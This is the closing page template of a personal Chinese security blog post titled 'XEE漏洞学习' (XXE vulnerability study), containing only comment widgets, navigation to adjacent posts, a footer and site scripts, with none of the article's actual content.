                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Atmujie</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Web安全</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    
        <div class="disqus-card card" data-aos="fade-up">
    <div id="disqus_thread" class="card-content">
        <noscript>Please enable JavaScript to view the
            <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
    </div>
</div>

<script type="text/javascript">
    disqus_config = function () {
        this.page.url = 'http://atmujie.github.io/2021/09/17/XEE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/';
        this.page.identifier = '/2021/09/17/XEE%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/';
        this.page.title = 'XEE漏洞学习';
    };
    let disqus_shortname = '';

    (function () { // DON'T EDIT BELOW THIS LINE
        let d = document, s = d.createElement('script');
        // 如：s.src = 'https://blinkfox.disqus.com/embed.js';
        s.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'GHiPEgESACHszUJMqTqLWQtF-gzGzoHsz',
        appKey: 'Lm6vLWBnRM3KIlhuo4tqDNDq',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/09/22/SSRF/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/12.jpg" class="responsive-img" alt="SSRF">
                        
                        <span class="card-title">SSRF</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-09-22
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Atmujie
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2021/09/04/JavaWeb%E5%85%A5%E9%97%A8/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/21.jpg" class="responsive-img" alt="JavaWeb入门">
                        
                        <span class="card-title">JavaWeb入门</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2021-09-04
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Atmujie
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E8%AF%AD%E8%A8%80/">
                        <span class="chip bg-color">语言</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


<!-- 代码块功能依赖 -->
<!-- <script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script> -->

<!-- 代码语言 -->
<!--  -->
<!-- <script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script> -->
<!--  -->

<!-- 代码块复制 -->
<!-- 
<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>
 -->

<!-- 代码块收缩 -->
<!--  -->

<!-- 代码块折行 -->
<!-- 
<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>
 -->

    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="/about" target="_blank">Atmujie</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="https://beian.miit.gov.cn/" target="_blank">陇ICP备2022000869号</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/atmujie" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
